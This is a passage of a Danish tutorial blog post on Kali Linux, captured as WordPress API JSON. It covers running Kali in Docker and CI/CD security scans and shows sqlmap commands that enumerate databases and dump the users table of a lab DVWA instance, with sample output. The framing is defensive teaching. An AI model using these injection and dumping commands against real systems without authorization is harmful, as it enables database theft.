class=\"wp-block-paragraph\">Digital forensics bruges af virksomheder til at unders\u00f8ge sikkerhedsh\u00e6ndelser efter de er opst\u00e5et, og af retsh\u00e5ndh\u00e6vende myndigheder til efterforskning. Kombination af penetrationstestning (offensiv sikkerhed) og forensics (defensiv efterforskning) er grundlaget for en komplet sikkerhedsprofessionals kompetenceprofil.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"kali-linux-i-ci-cd-pipelines-og-automatiseret-sikkerhedstest\">Kali Linux i CI\/CD pipelines og automatiseret sikkerhedstest<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Moderne DevSecOps-praksis integrerer sikkerhedstest direkte i udviklingsprocessen. Kali Linux kan k\u00f8res som en Docker-container i CI\/CD-pipelines til automatiseret s\u00e5rbarhedstest af nye releases.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux&#8217;s officielle Docker-image er tilg\u00e6ngeligt via kalilinux\/kali-rolling:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Pull det officielle Kali Docker-image\nsudo docker pull kalilinux\/kali-rolling\n\n# Start en interaktiv Kali-container\nsudo docker run -it kalilinux\/kali-rolling \/bin\/bash\n\n# Installer kun de n\u00f8dvendige tools (reducerer imagest\u00f8rrelse markant)\napt update && apt install -y nmap nikto sqlmap\n\n# K\u00f8r en Nmap-skanning som en engangscontainer\nsudo docker run --rm kalilinux\/kali-rolling nmap -sV 192.168.56.101<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Et simpelt GitHub Actions workflow til automatiseret web-sikkerhedsscanning kan se s\u00e5dan ud:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>name: Security Scan\non: [push, pull_request]\n\njobs:\n  nikto-scan:\n    runs-on: ubuntu-latest\n    container:\n      image: kalilinux\/kali-rolling\n    steps:\n      - name: Install Nikto\n        run: apt update -q && apt install -y nikto\n      - name: Scan staging environment\n        run: nikto -h https:\/\/staging.example.com -output nikto-results.txt\n      - name: Upload results\n        uses: actions\/upload-artifact@v3\n        with:\n          name: security-scan-results\n          path: nikto-results.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Automatiserede scanninger erstatter ikke manuelle penetrationstests, men de fanger lavth\u00e6ngende frugter tidligt i udviklingsprocessen og reducerer den samlede omkostning ved sikkerhedstest markant. DAST-skanninger (Dynamic Application Security Testing) med Kali-baserede Docker-images integreret i CI\/CD-pipelines er en del af best practice for virksomheder der er underlagt NIS2-direktivet og s\u00f8ger at demonstrere l\u00f8bende sikkerhedstestning.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"sqlmap-til-automatiseret-sql-injektionstest\">SQLmap til automatiseret SQL-injektionstest<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">SQLmap er et open source-pentestingv\u00e6rkt\u00f8j der automatiserer detektering og udnyttelse af SQL-injektionss\u00e5rbarheder. Det underst\u00f8tter alle st\u00f8rre databasesystemer inklusiv MySQL, PostgreSQL, MSSQL, Oracle og SQLite, og kan automatisk hente databaseindhold, tabeller og i nogle tilf\u00e6lde f\u00e5 shell-adgang p\u00e5 s\u00e5rbare systemer.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">K\u00f8r SQLmap mod DVWA (Damn Vulnerable Web Application) i dit isolerede lab-milj\u00f8:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Test en specifik URL for SQL-injektion\nsqlmap -u \"http:\/\/192.168.56.101\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit\" \\\n  --cookie=\"PHPSESSID=abcd1234; security=low\" \\\n  --dbs\n\n# Dump tabeller fra en specifik database\nsqlmap -u \"http:\/\/192.168.56.101\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit\" \\\n  --cookie=\"PHPSESSID=abcd1234; security=low\" \\\n  -D dvwa --tables\n\n# Dump brugertabellen (kun i autoriseret testmilj\u00f8)\nsqlmap -u \"http:\/\/192.168.56.101\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit\" \\\n  --cookie=\"PHPSESSID=abcd1234; security=low\" \\\n  -D dvwa -T users --dump<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output fra en succesfuld detektering:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>[INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable\n[INFO] the back-end DBMS is MySQL\nback-end DBMS: MySQL >= 5.0.12\n[INFO] fetching database names\navailable databases [2]:\n[*] dvwa\n[*] information_schema<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">SQLmap-tests mod DVWA giver en realistisk fornemmelse for, hvad en angriber kan opn\u00e5 mod en SQL-injektionss\u00e5rbar applikation. I virkelige engagementer bruges SQLmap med et Authorization-header eller session-cookies fra en autoriseret test-konto i applikationen. Se vores dybdeg\u00e5ende artikel om <a href=\"\/sql-injection-nodejs\/\">SQL-injektion i Node.js<\/a> for at forst\u00e5, hvordan man forebygger netop de s\u00e5rbarheder SQLmap finder.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux er et af de mest alsidige og kraftfulde platforme inden for cybersikkerhed. Fra netv\u00e6rksskanning med Nmap til web-applikationstest med Burp Suite, fra password-cracking med Hashcat til digitalt retsmedicin med Autopsy, giver det et komplet arsenal af sikkerhedsv\u00e6rkt\u00f8jer i \u00e9t gratis og open source-operativsystem. Med grundig \u00f8velse i et isoleret lab-milj\u00f8 og respekt for juridiske og etiske gr\u00e6nser er Kali Linux startpunktet for en karriere inden for cybersikkerhed i Danmark og internationalt.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kali Linux er det foretrukne operativsystem for professionelle penetrationstestere, sikkerhedsforskere og etiske hackere verden over. Med over 600 forudinstallerede sikkerhedsv\u00e6rkt\u00f8jer giver det adgang til alt fra netv\u00e6rksskanning til password-cracking i\u2026<\/p>\n","protected":false},"author":9,"featured_media":137,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-136","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/posts\/136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/comments?post=136"}],"version-history":[{"count":1,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/posts\/136\/revisions"}],"predecessor-version":[{"id":138,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/posts\/136\/revisions\/138"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/media\/137"}],"wp:attachment":[{"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/media?parent=136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/categories?post=136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shattered.io\/dk\/wp-json\/wp\/v2\/tags?post=136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}